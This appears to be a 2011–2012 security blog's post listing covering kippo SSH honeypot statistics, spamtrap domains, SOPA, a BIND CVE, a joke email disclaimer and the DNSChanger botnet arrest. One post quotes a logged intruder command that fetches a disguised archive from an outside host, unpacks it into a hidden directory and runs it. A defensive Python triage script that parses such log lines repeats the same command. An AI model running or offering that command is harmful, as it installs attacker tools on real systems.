spamversand

projecthoneypot.org

by on Jan.26, 2012, under Honeypots

Today I received a notification from projecthoneypot.org
that one of my donated spamtrap-domains helped to catch a new
harvester. Feels good to be able to help :-)


kippo-graph

by on Dec.28, 2011, under Honeypots

After trying to build some nice graphs for the kippo-honeypot with PyCha I found
this little toolbox making things way better than I did:

kippo-graph Homepage (link fixed)

Here are the first results from my honeypot: (no live db-queries made, so Inputs
are not visible right now) Kippo-Stats


kippo stats

by on Dec.14, 2011, under Honeypots

The kippo honeypot has now been running for about a week.

Up to now I have seen

* more than 1.3 Million Connects

* more than 7.100 successful logins

* > 2.200 commands typed

* more than 2.100 different Source IP addresses

* 178 Files uploaded, most of them psyBNC bouncers

Wow.. I expected *some* brute-force attempts, but that much?


successful ssh brute-force found by kippo

by on Dec.07, 2011, under Honeypots

The sshd honeypot named kippo is a fun tool to play with. After installing it I found
more than 1000 successful logins in about 12 hours! Most logins do nothing
after having success, but some download files and try to do “things”:

-rw------- 1 kippo kippo 81211778 Dec 6 23:20 20111206231910_http___download_microsoft_com_download_win2000platform_SP_SP3_NT5_EN_US_W2Ksp3_exe
-rw------- 1 kippo kippo 34603008 Dec 7 01:19 20111207011938_http___download_microsoft_com_download_win2000platform_SP_SP3_NT5_EN_US_W2Ksp3_exe
-rw------- 1 kippo kippo 53477376 Dec 7 01:21 20111207012055_http___download_microsoft_com_download_win2000platform_SP_SP3_NT5_EN_US_W2Ksp3_exe
-rw------- 1 kippo kippo 3513408 Dec 7 01:21 20111207012120_http___www_steampowered_com_download_hldsupdatetool_bin
-rw------- 1 kippo kippo 608074 Dec 7 08:46 20111207084559_http___4u_moy_su_bnc_jpg

coming from commands like:

CMD: wget http://4u.moy.su/bnc.jpg;tar zxvf bnc.jpg;rm -rf bnc.jpg;cd .log;./go

I will try to build some public stats later..
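
A triage sketch for such CMD lines, added here as an example and not part of the original post or of kippo itself: it splits a command chained with ';', lists the fetched URLs, and flags the pattern seen above (a download unpacked as an archive despite its name, a hidden directory, a local file being run). The function names and the log prefix of the sample line are assumptions; the saved-file naming rule is inferred from the listing above.

```python
import re
import shlex

ARCHIVE_TOOLS = {"tar", "unzip", "gunzip"}
ARCHIVE_EXT = (".tar", ".tgz", ".gz", ".bz2", ".zip")

def stored_name_suffix(url):
    """Saved-file name without its timestamp, as inferred from the listing
    above: every non-alphanumeric character of the URL becomes '_'."""
    return re.sub(r"[^A-Za-z0-9]", "_", url)

def analyse_cmd(line):
    """Return (urls, findings) for one log line containing 'CMD: '."""
    cmdline = line.partition("CMD: ")[2]
    urls, findings, fetched = [], [], set()
    for part in cmdline.split(";"):
        try:
            argv = shlex.split(part)
        except ValueError:  # unbalanced quotes typed by the intruder
            argv = part.split()
        if not argv:
            continue
        tool, args = argv[0], argv[1:]
        if tool in ("wget", "curl"):
            for a in args:
                if re.match(r"(?:https?|ftp)://", a):
                    urls.append(a)
                    fetched.add(a.rsplit("/", 1)[-1])
        elif tool in ARCHIVE_TOOLS:
            # A fetched file unpacked as an archive although its name says otherwise.
            findings += [f"archive disguised as {a}" for a in args
                         if a in fetched and not a.lower().endswith(ARCHIVE_EXT)]
        elif tool == "cd" and args:
            last = args[0].rstrip("/").split("/")[-1]
            if last.startswith(".") and last not in (".", ".."):
                findings.append(f"hidden directory {args[0]}")
        elif tool.startswith("./"):
            findings.append(f"runs local file {tool}")
    return urls, findings

# Constructed log line: timestamp and session prefix are made up; the
# command after 'CMD: ' is the one quoted in the post.
SAMPLE = ("2011-12-07 08:45:59 [session] CMD: wget http://4u.moy.su/bnc.jpg;"
          "tar zxvf bnc.jpg;rm -rf bnc.jpg;cd .log;./go")

if __name__ == "__main__":
    urls, findings = analyse_cmd(SAMPLE)
    for u in urls:
        print("download:", u, "-> saved as <timestamp>_" + stored_name_suffix(u))
    for f in findings:
        print("finding:", f)
```

The suffix returned by `stored_name_suffix` can be matched against the file names in the download directory to tie a session's command to the captured sample.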


SOPA

by on Dec.06, 2011, under Uncategorized

A Twitter message:

“Under SOPA, you could get 5 years for uploading a Michael Jackson
song, one year more than the doctor who killed him.”

For those who don’t know what SOPA means:

http://en.wikipedia.org/wiki/Stop_Online_Piracy_Act


whowas Service

by on Nov.28, 2011, under Uncategorized

An email from MAAWG informed me about a new service showing up at ARIN:

There is a new “whowas” service showing historical data for an IP or ASN.
It will be publicly available in a trial version at: https://www.arin.net/resources/whowas/.

One goal of the trial is to gather data about use cases and how
often the service would be used to determine whether to work on that goal.

So let’s see if this service can be helpful to us.


funny disclaimer

by on Nov.24, 2011, under Uncategorized

The following email disclaimer was found in a mail to the mailing list
“full disclosure”.
Sounds funny to me :-)

####################################################
***** IMPORTANT INFORMATION/DISCLAIMER *****

This document should be read only by those persons to whom it is addressed. If you have received this message it was obviously addressed to you and therefore you can read it, even if we didn’t mean to send it to you. However, if the contents of this email make no sense whatsoever then you probably were not the intended recipient, or, alternatively, you are a mindless cretin; either way, you should immediately kill yourself and destroy your computer (not necessarily in that order). Once you have taken this action, please contact us.. no, sorry, you can’t use your computer, because you just destroyed it, and possibly also committed suicide afterwards, but I am starting to digress……

The originator of this email is not liable for the transmission of the information contained in this communication. Or are they? Either way it’s a pretty dull legal query and frankly one I’m not going to dwell on. But should you have nothing better to do, please feel free to ruminate on it, and please pass on any concrete conclusions should you find them. However, if you pass them on via email, be sure to include a disclaimer regarding liability for transmission.

In the event that the originator did not send this email to you, then please return it to us and attach a scanned-in picture of your mother’s brother’s wife wearing nothing but a kangaroo suit, and we will immediately refund you exactly half of what you paid for the can of Whiskas you bought when you went to Pets At Home yesterday.

We take no responsibility for non-receipt of this email because we are running Exchange 5.5 and everyone knows how glitchy that can be. In the event that you do get this message then please note that we take no responsibility for that either. Nor will we accept any liability, tacit or implied, for any damage you may or may not incur as a result of receiving, or not, as the case may be, from time to time, notwithstanding all liabilities implied or otherwise, ummm, hell, where was I…umm, no matter what happens, it is NOT, and NEVER WILL BE, OUR FAULT!

The comments and opinions expressed herein are my own and NOT those of my employer, who, if he knew I was sending emails and surfing the seamier side of the Internet, would cut off my manhood and feed it to me for afternoon tea.


Spamfighter died

by on Nov.17, 2011, under Uncategorized

J.D. Falk, well known as a board member of CAUCE (Coalition Against Unsolicited Commercial Email) and organizer of MAAWG meetings, died of cancer yesterday.
One last RFC written by him was finished just hours before he passed away, through an extraordinary effort by the IETF: RFC 6449


bind 9 *again* vulnerable

by on Nov.17, 2011, under exploits

Shortly after the last remote DoS vulnerability in BIND 9, ISC announced another possibility to crash a server (this time only on recursive resolvers). See CVE-2011-4313 for more information.


Ghost Click: Botnet busted

by on Nov.10, 2011, under botnet

The FBI announced the arrest of 6 Estonian nationals for creating the world's biggest botnet (DNSChanger) so far:
FBI Announcement

The German magazine Heise also published an article about it:
Heise-Link
